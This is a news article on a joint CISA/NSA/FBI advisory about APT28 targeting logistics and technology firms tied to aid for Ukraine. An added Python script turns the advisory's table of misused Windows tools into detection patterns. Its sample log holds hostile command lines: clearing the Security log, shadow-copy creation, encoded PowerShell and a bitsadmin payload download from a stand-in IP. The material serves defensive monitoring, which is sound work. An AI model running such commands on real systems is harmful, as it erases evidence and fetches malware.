The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the NSA, FBI, and international cybersecurity bodies, has issued a joint advisory warning that Russian military hackers are actively targeting logistics and technology companies in the West.
The cyber campaign mainly focuses on organizations involved in transporting and delivering aid to Ukraine. The advisory, released on May 21, 2025, names the threat actor as the Russian GRU’s 85th Main Special Service Center—also known as APT28, Fancy Bear, or Forest Blizzard.
Ongoing Espionage Since 2022
According to the advisory, the cyber espionage campaign has been active since 2022 and uses known methods to gain access and gather intelligence.
“This cyber espionage-oriented campaign targeting technology companies and logistics entities uses a mix of previously disclosed tactics, techniques, and procedures,” the advisory states. “The authoring agencies expect similar targeting and TTP use to continue.”
Hackers have breached dozens of organizations across 13 countries, including the U.S., Ukraine, and several European nations. Key sectors affected include defense, maritime operations, air traffic management, IT services, and transportation facilities such as ports and airports.
Targeting Critical Infrastructure and Surveillance Devices
In a more alarming move, the attackers have accessed IP cameras at sensitive sites, such as border crossings and military areas, to track aid movements into Ukraine. More than 80% of these cameras were located in Ukraine, while others were in neighboring countries like Poland, Hungary, Romania, and Slovakia.
After breaching these networks, the attackers searched for data related to aid logistics—such as sender and recipient information, transport IDs, travel routes, container numbers, and cargo descriptions.
Use of Common Windows Tools for Malicious Purposes
The GRU group has used built-in Windows utilities to perform unauthorized activities and avoid detection. Below is a summary of how these tools were misused:
| Utility | Description of Malicious Use |
|---|---|
| ntdsutil | Extracted Active Directory databases for credential harvesting. |
| wevtutil | Cleared Windows event logs to erase evidence of attacks. |
| vssadmin | Created shadow copies to access locked files during data theft. |
| schtasks | Set up malicious scheduled tasks to maintain access. |
| wmic | Collected system data and ran remote commands for lateral movement. |
| certutil | Decoded malicious files and validated forged certificates. |
| net | Listed network shares and user accounts for reconnaissance. |
| reg | Changed registry settings to disable defenses and keep persistence. |
| powershell | Ran encoded scripts to steal credentials and install malware. |
| bitsadmin | Downloaded additional malware while avoiding detection. |
| icacls | Changed file permissions to access sensitive documents. |
The advisory warns that these activities show how the hackers can repurpose everyday system tools to conduct surveillance and data theft without relying on external malware.
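As an added illustration (not code from the advisory or this article), the script below turns the misuse descriptions in the table into command-line detection patterns and runs them over process-creation events, the kind of log review the advisory's monitoring recommendation calls for. The flattened log format, the hostnames, users and sample command lines, and the patterns themselves are constructed assumptions, not CISA's own rules.

```python
import re
from typing import Optional

# Command-line patterns, one per utility from the advisory's table, keyed to the
# misuse it describes. These are assumed starting points, not CISA's own rules.
LOLBIN_PATTERNS = {
    "ntdsutil": (r"ntdsutil.*\bntds\b", "AD database extraction"),
    "wevtutil": (r"wevtutil(\.exe)?\s+(cl|clear-log)\b", "event log clearing"),
    "vssadmin": (r"vssadmin.*\bcreate\s+shadow", "shadow copy creation"),
    "schtasks": (r"schtasks.*\s/create\b", "scheduled task persistence"),
    "wmic": (r"wmic.*\bprocess\s+call\s+create\b", "remote command execution"),
    "certutil": (r"certutil.*\s-decode\b", "payload decoding"),
    "net": (r"\bnet1?(\.exe)?\s+(view|user|share|group)\b", "share/account recon"),
    "reg": (r"reg(\.exe)?\s+add\b.*defender", "defence tampering via registry"),
    "powershell": (r"powershell.*\s-(e|ec|enc|encodedcommand)\b", "encoded script"),
    "bitsadmin": (r"bitsadmin.*\s/transfer\b", "BITS download"),
    "icacls": (r"icacls.*\s/grant\b", "permission change"),
}

# Constructed process-creation records (4688 / Sysmon 1 style), flattened to
# "timestamp host=.. user=.. cmd=.." for this example.
SAMPLE_LOG = """\
2025-05-20T08:01:12Z host=WKS-04 user=jsmith cmd=net use Z: \\\\files\\share
2025-05-20T08:03:40Z host=DC-01 user=svc_backup cmd=vssadmin create shadow /for=C:
2025-05-20T08:03:55Z host=DC-01 user=svc_backup cmd=wevtutil.exe cl Security
2025-05-20T08:04:10Z host=WKS-09 user=mkowal cmd=powershell.exe -nop -w hidden -enc QQBCAEMA
2025-05-20T08:04:30Z host=WKS-09 user=mkowal cmd=bitsadmin /transfer job1 http://198.51.100.7/a.bin C:\\Users\\Public\\a.bin
2025-05-20T08:06:00Z host=WKS-04 user=jsmith cmd=certutil -hashfile report.pdf SHA256
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

def classify(cmd: str) -> Optional[tuple]:
    """Return (utility, reason) for the first matching misuse pattern, else None."""
    for util, (pattern, reason) in LOLBIN_PATTERNS.items():
        if re.search(pattern, cmd, re.IGNORECASE):
            return util, reason
    return None

def detect(text: str) -> list:
    """Return records whose command line matches a misuse pattern, verdict attached."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)          # malformed lines are skipped
        if not m:
            continue
        verdict = classify(m["cmd"])
        if verdict:
            hits.append({**m.groupdict(), "utility": verdict[0], "reason": verdict[1]})
    return hits
```

Running `detect(SAMPLE_LOG)` flags the shadow-copy creation and log clearing on DC-01 and the encoded PowerShell and BITS download on WKS-09, while the routine `net use` and `certutil -hashfile` lines pass; in practice the verdicts would be enriched with user and host baselines before alerting.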
International Response and Recommendations
The alert is backed by cybersecurity authorities from the U.S., U.K., Germany, Poland, the Czech Republic, Australia, Canada, France, Denmark, Estonia, and the Netherlands. This wide support reflects international concern about the GRU’s continued operations.
CISA urges companies in logistics and tech sectors to take immediate action. Recommended steps include:
- Enable network segmentation to limit lateral movement.
- Use multi-factor authentication with strong methods.
- Apply security patches and software updates regularly.
- Monitor system and access logs for unusual activity.
This alert follows a similar warning earlier this month, in which Russian hackers were linked to attacks on water system infrastructure. These ongoing threats show the growing danger of state-sponsored cyber operations targeting critical industries worldwide.